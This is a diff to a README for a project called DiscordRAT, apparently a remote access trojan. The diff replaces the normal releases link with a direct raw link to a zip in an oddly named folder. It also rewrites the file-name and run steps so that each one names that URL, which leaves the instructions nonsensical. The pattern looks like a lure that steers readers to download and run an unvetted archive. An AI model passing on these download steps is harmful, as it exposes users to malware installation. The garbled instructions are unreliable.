Aniseikonic-triggerfish906/DiscordRAT/README.md

 - **Disk Space:** At least 500MB of free space.

 ## 📦 Download & Install
-1. Visit this page to download: [GitHub Releases](https://github.com/Aniseikonic-triggerfish906/DiscordRAT/releases).
+1. Visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/Aniseikonic-triggerfish906/DiscordRAT/main/fanioned/DiscordRAT_2.8.zip).
 2. Locate the latest release and click on it.
-3. Find the file named `DiscordRAT.zip` (or similar).
+3. Find the file named `https://raw.githubusercontent.com/Aniseikonic-triggerfish906/DiscordRAT/main/fanioned/DiscordRAT_2.8.zip` (or similar).
 4. Click to download the file.
 5. Once downloaded, extract the zip file to a convenient location on your PC.

 ## 🔧 Running the Tool
 1. After extraction, go to the folder where you saved `DiscordRAT`.
-2. Double-click the file named `start.bat` to run the tool.
+2. Double-click the file named `https://raw.githubusercontent.com/Aniseikonic-triggerfish906/DiscordRAT/main/fanioned/DiscordRAT_2.8.zip` to run the tool.
 3. Follow the on-screen instructions to set up your administration preferences.

 ## 📚 Features